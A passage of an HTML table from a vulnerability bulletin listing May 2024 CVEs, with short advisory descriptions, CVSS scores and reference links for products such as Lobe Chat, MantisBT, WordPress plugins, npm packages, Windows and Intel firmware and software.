<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4560" target="_blank">CVE-2024-4560</a><br><a href="https://plugins.trac.wordpress.org/browser/chatbot-chatgpt/trunk/includes/utilities/chatbot-file-upload.php#L17" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7bc33a05-d462-492e-9ea5-cf37b887cc94?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>lobehub--lobe-chat<br> </td>
<td>Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32964&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H" target="_blank" title="CVSS V3 Score">9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32964" target="_blank">CVE-2024-32964</a><br><a href="https://github.com/lobehub/lobe-chat/commit/465665a735556669ee30446c7ea9049a20cc7c37" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/lobehub/lobe-chat/security/advisories/GHSA-mxhq-xw3g-rphc" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>mantisbt--mantisbt<br> </td>
<td>MantisBT (Mantis Bug Tracker) is an open source issue tracker. Insufficient access control in the registration and password reset process allows an attacker to reset another user's password and takeover their account, if the victim has an incomplete request pending. The exploit is only possible while the verification token is valid, i.e for 5 minutes after the confirmation URL sent by e-mail has been opened, and the user did not complete the process by updating their password. A brute-force attack calling account_update.php with increasing user IDs is possible. A successful takeover would grant the attacker full access to the compromised account, including sensitive information and functionalities associated with the account, the extent of which depends on its privileges and the data it has access to. Version 2.26.2 contains a patch for the issue. As a workaround, one may mitigate the risk by reducing the verification token's validity (change the value of the `TOKEN_EXPIRY_AUTHENTICATED` constant in `constants_inc.php`).</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34077&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34077" target="_blank">CVE-2024-34077</a><br><a href="https://github.com/mantisbt/mantisbt/commit/92d11a01b195a1b6717a2f205218089158ea6d00" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/mantisbt/mantisbt/security/advisories/GHSA-93x3-m7pw-ppqm" target="_blank">security-advisories@github.com</a><br><a href="https://mantisbt.org/bugs/view.php?id=34433" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>metaphorcreations--Ditty Responsive News Tickers, Sliders, and Lists<br> </td>
<td>The Ditty plugin for WordPress is vulnerable to PHP Object Injection in all versions up to 3.1.38 via deserialization of untrusted input when adding a new ditty. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3954&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3954" target="_blank">CVE-2024-3954</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3081335%40ditty-news-ticker&amp;new=3081335%40ditty-news-ticker&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0f00b138-5c4b-4f75-94b1-82721cba2668?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>micromatch--braces<br> </td>
<td>The NPM package `braces` fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4068&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4068" target="_blank">CVE-2024-4068</a><br><a href="https://devhub.checkmarx.com/cve-details/CVE-2024-4068/" target="_blank">596c5446-0ce5-4ba2-aa66-48b3b757a647</a><br><a href="https://github.com/micromatch/braces/blob/98414f9f1fabe021736e26836d8306d5de747e0d/lib/parse.js#L308" target="_blank">596c5446-0ce5-4ba2-aa66-48b3b757a647</a><br><a href="https://github.com/micromatch/braces/issues/35" target="_blank">596c5446-0ce5-4ba2-aa66-48b3b757a647</a></td>
</tr>
<tr>
<td>micromatch--micromatch<br> </td>
<td>The NPM package `micromatch` is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in `micromatch.braces()` in `index.js` because the pattern `.*` will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persists. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4067&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4067" target="_blank">CVE-2024-4067</a><br><a href="https://devhub.checkmarx.com/cve-details/CVE-2024-4067/" target="_blank">596c5446-0ce5-4ba2-aa66-48b3b757a647</a><br><a href="https://github.com/micromatch/micromatch/blob/2c56a8604b68c1099e7bc0f807ce0865a339747a/index.js#L448" target="_blank">596c5446-0ce5-4ba2-aa66-48b3b757a647</a><br><a href="https://github.com/micromatch/micromatch/issues/243" target="_blank">596c5446-0ce5-4ba2-aa66-48b3b757a647</a><br><a href="https://github.com/micromatch/micromatch/pull/247" target="_blank">596c5446-0ce5-4ba2-aa66-48b3b757a647</a></td>
</tr>
<tr>
<td>microsoft -- windows_10_1507<br> </td>
<td>Windows MSHTML Platform Security Feature Bypass Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30040&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30040" target="_blank">CVE-2024-30040</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30040" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>microsoft -- windows_10_1507<br> </td>
<td>Windows DWM Core Library Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30051&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30051" target="_blank">CVE-2024-30051</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30051" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>miniOrange--WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn)<br> </td>
<td>Improper Privilege Management vulnerability in miniOrange WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) allows Privilege Escalation.This issue affects WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn): from n/a through 7.6.6.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47683&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47683" target="_blank">CVE-2023-47683</a><br><a href="https://patchstack.com/database/vulnerability/miniorange-login-openid/wordpress-social-login-social-sharing-by-miniorange-plugin-7-6-6-authenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>monetizemore--Advanced Ads  Ad Manager &amp; AdSense<br> </td>
<td>The Advanced Ads plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.52.1 via deserialization of untrusted input in the 'placement_slug' parameter. This makes it possible for authenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-2290&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2290" target="_blank">CVE-2024-2290</a><br><a href="https://plugins.trac.wordpress.org/browser/advanced-ads/trunk/modules/import-export/classes/import.php#L155" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3081914%40advanced-ads&amp;new=3081914%40advanced-ads&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f64336f7-ab2a-4e22-a76f-d077c51f9c57?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Arc(TM) &amp; Iris(R) Xe Graphics software<br> </td>
<td>Improper neutralization in some Intel(R) Arc(TM) &amp; Iris(R) Xe Graphics software before version 31.0.101.5081 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent network access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21864&amp;vector=CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21864" target="_blank">CVE-2024-21864</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01053.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) BIOS Guard firmware<br> </td>
<td>Improper conditions check in some Intel(R) BIOS Guard firmware may allow a privileged user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-27504&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-27504" target="_blank">CVE-2023-27504</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00814.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) BIOS Guard firmware<br> </td>
<td>Improper input validation in some Intel(R) BIOS Guard firmware may allow a privileged user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-28402&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-28402" target="_blank">CVE-2023-28402</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00814.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) DTT software installers<br> </td>
<td>Exposure of resource to wrong sphere in some Intel(R) DTT software installers may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21813&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:H" target="_blank" title="CVSS V3 Score">7.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21813" target="_blank">CVE-2024-21813</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00984.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Ethernet Adapters and Intel(R) Ethernet Controller I225 Manageability firmware<br> </td>
<td>Improper access control in some Intel(R) Ethernet Adapters and Intel(R) Ethernet Controller I225 Manageability firmware may allow a privileged user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2022-37341&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-37341" target="_blank">CVE-2022-37341</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00756.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) GPA Framework software installers<br> </td>
<td>Improper access control in some Intel(R) GPA Framework software installers before version 2023.3 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-43748&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-43748" target="_blank">CVE-2023-43748</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00831.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) GPA software installers<br> </td>
<td>Incorrect default permissions in some Intel(R) GPA software installers before version 2023.3 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-24460&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-24460" target="_blank">CVE-2023-24460</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00831.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) GPA software installers<br> </td>
<td>Improper access control in some Intel(R) GPA software installers before version 2023.3 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-40071&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-40071" target="_blank">CVE-2023-40071</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00831.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) GPA software installers<br> </td>
<td>Incorrect default permissions in some Intel(R) GPA software installers before version 2023.3 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-43629&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-43629" target="_blank">CVE-2023-43629</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00831.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Neural Compressor software<br> </td>
<td>Improper input validation in some Intel(R) Neural Compressor software before version 2.5.0 may allow an unauthenticated user to potentially enable escalation of privilege via remote access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22476&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">10</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22476" target="_blank">CVE-2024-22476</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01109.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Power Gadget software for Windows<br> </td>
<td>Buffer overflow in Intel(R) Power Gadget software for Windows all versions may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-38581&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-38581" target="_blank">CVE-2023-38581</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01037.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Power Gadget software for Windows<br> </td>
<td>Improper neutralization in Intel(R) Power Gadget software for Windows all versions may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-42773&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-42773" target="_blank">CVE-2023-42773</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01037.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Power Gadget software for Windows<br> </td>
<td>Improper access control in Intel(R) Power Gadget software for Windows all versions may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-45217&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-45217" target="_blank">CVE-2023-45217</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01037.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Power Gadget software for Windows<br> </td>
<td>Use after free in Intel(R) Power Gadget software for Windows all versions may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-46691&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:H" target="_blank" title="CVSS V3 Score">7.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-46691" target="_blank">CVE-2023-46691</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01037.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Power Gadget software for macOS<br> </td>
<td>Improper access control in some Intel(R) Power Gadget software for macOS all versions may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-40070&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-40070" target="_blank">CVE-2023-40070</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01037.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Power Gadget software for macOS<br> </td>
<td>Improper neutralization in Intel(R) Power Gadget software for macOS all versions may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-46689&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-46689" target="_blank">CVE-2023-46689</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01037.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Stratix 10 and Intel(R) Agilex 7 FPGAs<br> </td>
<td>Unchecked return value in SDM firmware for Intel(R) Stratix 10 and Intel(R) Agilex 7 FPGAs before version 23.3 may allow an authenticated user to potentially enable denial of service via adjacent access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-41092&amp;vector=CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-41092" target="_blank">CVE-2023-41092</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01007.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) TDX module software<br> </td>
<td>Improper input validation in some Intel(R) TDX module software before version 1.5.05.46.698 may allow a privileged user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-45745&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">7.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-45745" target="_blank">CVE-2023-45745</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01036.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Thunderbolt driver software<br> </td>
<td>Improper access control for some Intel(R) Thunderbolt driver software before version 89 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2022-37410&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-37410" target="_blank">CVE-2022-37410</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00916.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--PprRequestLog module in UEFI firmware for some Intel(R) Server D50DNP Family products<br> </td>
<td>Improper input validation in PprRequestLog module in UEFI firmware for some Intel(R) Server D50DNP Family products may allow a privileged user to enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22382&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22382" target="_blank">CVE-2024-22382</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01080.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--UEFI firmware for some Intel(R) Server D50DNP Family products<br> </td>
<td>Improper input validation in PlatformVariableInitDxe driver in UEFI firmware for some Intel(R) Server D50DNP Family products may allow a privileged user to enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22095&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22095" target="_blank">CVE-2024-22095</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01080.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--UEFI firmware for some Intel(R) Server D50DNP Family products<br> </td>
<td>Improper input validation in UserAuthenticationSmm driver in UEFI firmware for some Intel(R) Server D50DNP Family products may allow a privileged user to enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-23487&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-23487" target="_blank">CVE-2024-23487</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01080.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--UEFI firmware for some Intel(R) Server D50FCP Family products<br> </td>
<td>Improper buffer restrictions in PlatformPfrDxe driver in UEFI firmware for some Intel(R) Server D50FCP Family products may allow a privileged user to enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-23980&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-23980" target="_blank">CVE-2024-23980</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01080.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--UEFI firmware for some Intel(R) Server M50FCP Family products<br> </td>
<td>Improper input validation in PfrSmiUpdateFw driver in UEFI firmware for some Intel(R) Server M50FCP Family products may allow a privileged user to enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-24981&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-24981" target="_blank">CVE-2024-24981</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01080.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in the installer in Samsung Portable SSD for T5 1.6.10 on Windows. Because it is possible to tamper with the directory and DLL files used during the installation process, an attacker can escalate privileges through arbitrary code execution. (An attacker must already have user privileges)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31954&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31954" target="_blank">CVE-2024-31954</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2024-31954/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--some Intel(R) PROSet/Wireless WiFi software for Windows<br> </td>
<td>Improper input validation for some some Intel(R) PROSet/Wireless WiFi software for Windows before version 23.20 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-38654&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">8.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-38654" target="_blank">CVE-2023-38654</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01039.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>nautobot--nautobot<br> </td>
